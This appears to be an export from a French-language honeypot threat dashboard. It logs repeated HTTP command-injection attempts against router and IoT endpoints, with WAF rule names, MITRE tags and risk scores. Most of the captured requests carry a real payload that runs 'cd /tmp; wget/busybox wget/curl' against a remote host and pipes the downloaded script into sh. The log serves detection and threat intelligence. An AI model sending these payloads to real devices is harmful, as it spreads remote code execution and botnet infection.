Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /adv_remotelog.asp?syslogServerAddr=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20
Requête brute (extrait)
GET /adv_remotelog.asp?syslogServerAddr=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20billion%60 HTTP/1. |
|||||||
| TCP | 82 · HTTP | http | Injection de commande cmd injection · via HTTP:82 · (tentative d'exploit) · → /cgi-bin/diagnostics.cgi | Élevée | Élevé · 81 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /cgi-bin/diagnostics.cgi
Émulateur
HTTP
WAF
53
Recommandation
Investiguer
Tags
Cible HTTP
POST
/cgi-bin/diagnostics.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
82
Chemin / cible
/cgi-bin/diagnostics.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 81
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Signaux
MITRE-T1059
Http Cmdi
pat-0773
pat-0775
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932200
CRS 932205
SSRF Localhost SSRF
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-2
ssrf-3
nosqli-3
Payload (extrait)
POST /cgi-bin/diagnostics.cgi HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded Content-Length: 18
Requête brute (extrait)
POST /cgi-bin/diagnostics.cgi HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded Content-Length: 180 Connection: close ping=127.0.0.1`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s airspan;busybox wget http://91.92.40.1 |
|||||||
| TCP | 82 · HTTP | http | Injection de commande cmd injection · via HTTP:82 · (tentative d'exploit) · → /diagnostic.php | Élevée | Élevé · 81 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /diagnostic.php
Émulateur
HTTP
WAF
41
Recommandation
Investiguer
Tags
Cible HTTP
POST
/diagnostic.php
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
82
Chemin / cible
/diagnostic.php
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 81
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /diagnostic.php HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Leng
Requête brute (extrait)
POST /diagnostic.php HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 218 Connection: close act=ping&dst=%26%20cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20ddiag%3Bbusybo |
|||||||
| TCP | 82 · HTTP | http | Sonde fichier configuration config file probe · via HTTP:82 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20… | Élevée | Moyen · 64 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%2…
Émulateur
HTTP
WAF
47
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20alcatel;
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
82
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20al…
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: chemin sensible (tag interne) · Règle WAF « lfi-12 » · Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 64
Confiance : Confiance 100 % — 7 tag(s) WAF
Signaux
Http Sensitive
Upstream
Waf Score
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /cgi-bin/masterCGI?ping=nomip&user=;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wge
Requête brute (extrait)
GET /cgi-bin/masterCGI?ping=nomip&user=;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20alcatel; HTTP/1.1 Ho |
|||||||
| TCP | 82 · HTTP | http | Injection de commande cmd injection · via HTTP:82 · (tentative d'exploit) · → /cgi-bin/;cd | Élevée | Moyen · 54 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
GET /cgi-bin/;cd
Émulateur
HTTP
WAF
13
Recommandation
Investiguer
Tags
Cible HTTP
GET
/cgi-bin/;cd
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
82
Chemin / cible
/cgi-bin/;cd
Service
HTTP
Pourquoi cette classification : Injection de commande (tag rce-0) · Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 54
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Signaux
MITRE-T1059
pat-0773
pat-0775
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /cgi-bin/;cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s wavlink;busybox wget http://91.92.40.118/wget.sh -O-|sh -s wavl
Requête brute (extrait)
GET /cgi-bin/;cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s wavlink;busybox wget http://91.92.40.118/wget.sh -O-|sh -s wavlink;curl http://91.92.40.118/wget.sh|sh -s wavlink HTTP/1.1 Host: 62.3.50.33:82 Connection: close |
|||||||
| TCP | 82 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:82 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wge… | Élevée | Moyen · 60 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20hi…
Émulateur
HTTP
WAF
54
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20hik3%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20hik3%60
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
82
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20hik3%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20hik3%60
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 59%
Confiance classification
59%
Risque capteur
Moyen
· 60
Confiance : Confiance 59 % — 8 tag(s) WAF
Signaux
CRS-930100-sub
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /Security/auditLog/search?logTime=0;%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wge
Requête brute (extrait)
GET /Security/auditLog/search?logTime=0;%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20hik3%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20hik3%60 HTTP/1.1 Host: |
|||||||
| TCP | 82 · HTTP | http | Sonde fichier configuration config file probe · via HTTP:82 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wg… | Élevée | Moyen · 64 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20t…
Émulateur
HTTP
WAF
54
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20toto5%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20toto5%60
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
82
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20toto5%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20toto5%…
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: chemin sensible (tag interne) · Règle WAF « lfi-12 » · Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 64
Confiance : Confiance 100 % — 8 tag(s) WAF
Signaux
Http Sensitive
Upstream
Waf Score
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /cgi-bin/downloadFlile.cgi?name=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%2
Requête brute (extrait)
GET /cgi-bin/downloadFlile.cgi?name=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20toto5%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20toto5%60 HTTP/1.1 Host: 6 |
|||||||
| TCP | 82 · HTTP | http | Sonde fichier configuration config file probe · via HTTP:82 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20w… | Élevée | Moyen · 64 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20…
Émulateur
HTTP
WAF
60
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20tuoshi%60
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
82
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20tuos…
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: chemin sensible (tag interne) · Règle WAF « lfi-12 » · Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 64
Confiance : Confiance 100 % — 9 tag(s) WAF
Signaux
Http Sensitive
Upstream
Waf Score
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Probe /cgi-bin/luci
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
redir-1
webshell-param-cmd
Payload (extrait)
GET /cgi-bin/luci?cmd=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http://91.92
Requête brute (extrait)
GET /cgi-bin/luci?cmd=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20tuoshi%60 HTTP/1.1 Host: 62.3.50.33:8 |
|||||||
| TCP | 82 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:82 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wg… | Élevée | Élevé · 65 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20m…
Émulateur
HTTP
WAF
62
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20mdomo%60
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
82
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20mdomo%…
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 65
Confiance : Confiance 100 % — 9 tag(s) WAF
Signaux
CRS-930100-sub
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
lfi-14
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /rc/index.php?param=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http://91.9
Requête brute (extrait)
GET /rc/index.php?param=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20mdomo%60 HTTP/1.1 Host: 62.3.50.33:82 |
|||||||
| TCP | 82 · HTTP | http | Injection de commande cmd injection · via HTTP:82 · (tentative d'exploit) · → /api/tunnel/tailscale-install | Élevée | Élevé · 81 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /api/tunnel/tailscale-install
Émulateur
HTTP
WAF
51
Recommandation
Investiguer
Tags
Cible HTTP
POST
/api/tunnel/tailscale-install
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
82
Chemin / cible
/api/tunnel/tailscale-install
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 81
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Signaux
MITRE-T1059
Http Cmdi
pat-0773
pat-0775
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932200
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
k8s-api
Payload (extrait)
POST /api/tunnel/tailscale-install HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/json Content-Length: 176 Connectio
Requête brute (extrait)
POST /api/tunnel/tailscale-install HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/json Content-Length: 176 Connection: close {"cmd":"`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s 9router;busybox wget http://91.92.40.118/wget.sh -O-|sh
|
|||||||
| TCP | 82 · HTTP | http | Injection de commande cmd injection · via HTTP:82 · (tentative d'exploit) · → /api/network/settings | Élevée | Élevé · 81 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /api/network/settings
Émulateur
HTTP
WAF
51
Recommandation
Investiguer
Tags
Cible HTTP
POST
/api/network/settings
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
82
Chemin / cible
/api/network/settings
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 81
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Signaux
MITRE-T1059
Http Cmdi
pat-0773
pat-0775
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932200
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
k8s-api
Payload (extrait)
POST /api/network/settings HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded Content-Length: 166
Requête brute (extrait)
POST /api/network/settings HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded Content-Length: 166 Connection: close hostname=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s russ;busybox wget http://91.92.40.118/wget.sh |
|||||||
| TCP | 82 · HTTP | http | Injection de commande cmd injection · via HTTP:82 · (tentative d'exploit) · → /JNAP/ | Élevée | Élevé · 81 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /JNAP/
Émulateur
HTTP
WAF
66
Recommandation
Investiguer
Tags
Cible HTTP
POST
/JNAP/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
82
Chemin / cible
/JNAP/
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 81
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /JNAP/ HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/json; charset=utf-8 X-JNAP-Action: http://linksys.com/jnap
Requête brute (extrait)
POST /JNAP/ HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/json; charset=utf-8 X-JNAP-Action: http://linksys.com/jnap/firmware/Upgrade Content-Length: 251 Connection: close {"JNAP":{"action":"http://linksys.com/jnap/firmware/Upgrade","comma
|
|||||||
| TCP | 82 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:82 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%2… | Élevée | Moyen · 59 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%…
Émulateur
HTTP
WAF
41
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lsysinfo
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
82
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20…
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 59%
Confiance classification
59%
Risque capteur
Moyen
· 59
Confiance : Confiance 59 % — 6 tag(s) WAF
Signaux
CRS-930100-sub
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /sysinfo.cgi?action=;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http://91.
Requête brute (extrait)
GET /sysinfo.cgi?action=;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lsysinfo HTTP/1.1 Host: 62.3.50.3 |
|||||||
| TCP | 82 · HTTP | http | Sonde fichier configuration config file probe · via HTTP:82 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20w… | Élevée | Moyen · 64 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20…
Émulateur
HTTP
WAF
41
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lsetup
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
82
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lset…
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: chemin sensible (tag interne) · Règle WAF « lfi-12 » · Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 64
Confiance : Confiance 100 % — 6 tag(s) WAF
Signaux
Http Sensitive
Upstream
Waf Score
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /setup.cgi?next_file=;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http://91.9
Requête brute (extrait)
GET /setup.cgi?next_file=;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lsetup HTTP/1.1 Host: 62.3.50.33:82 |
|||||||
| TCP | 82 · HTTP | http | Sonde HTTP smuggling http smuggling probe · via HTTP:82 · (tentative d'exploit) · → /JNAP/ | Élevée | Élevé · 79 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /JNAP/
Émulateur
HTTP
WAF
52
Recommandation
Investiguer
Tags
Cible HTTP
POST
/JNAP/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
82
Chemin / cible
/JNAP/
Service
HTTP
Pourquoi cette classification : Motif SSRF · confiance 95%
Confiance classification
95%
Risque capteur
Élevé
· 79
Confiance : Confiance 95 % — Motif catalogue confirmé · 8 tag(s) WAF
Signaux
pat-0842
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /JNAP/ HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded X-JNAP-ACTION: http://linksys.com/jn
Requête brute (extrait)
POST /JNAP/ HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded X-JNAP-ACTION: http://linksys.com/jnap/wpsstationinfo/GetStationInfo Content-Length: 205 Connection: close device_name=cd%20/tmp%3Bwget%20http://91.92.40.118/w |
|||||||
| TCP | 82 · HTTP | http | Sonde fichier configuration config file probe · via HTTP:82 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wg… | Élevée | Moyen · 64 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20t…
Émulateur
HTTP
WAF
47
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20tenda
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
82
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20tenda
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: chemin sensible (tag interne) · Règle WAF « lfi-12 » · Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 64
Confiance : Confiance 100 % — 7 tag(s) WAF
Signaux
Http Sensitive
Upstream
Waf Score
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
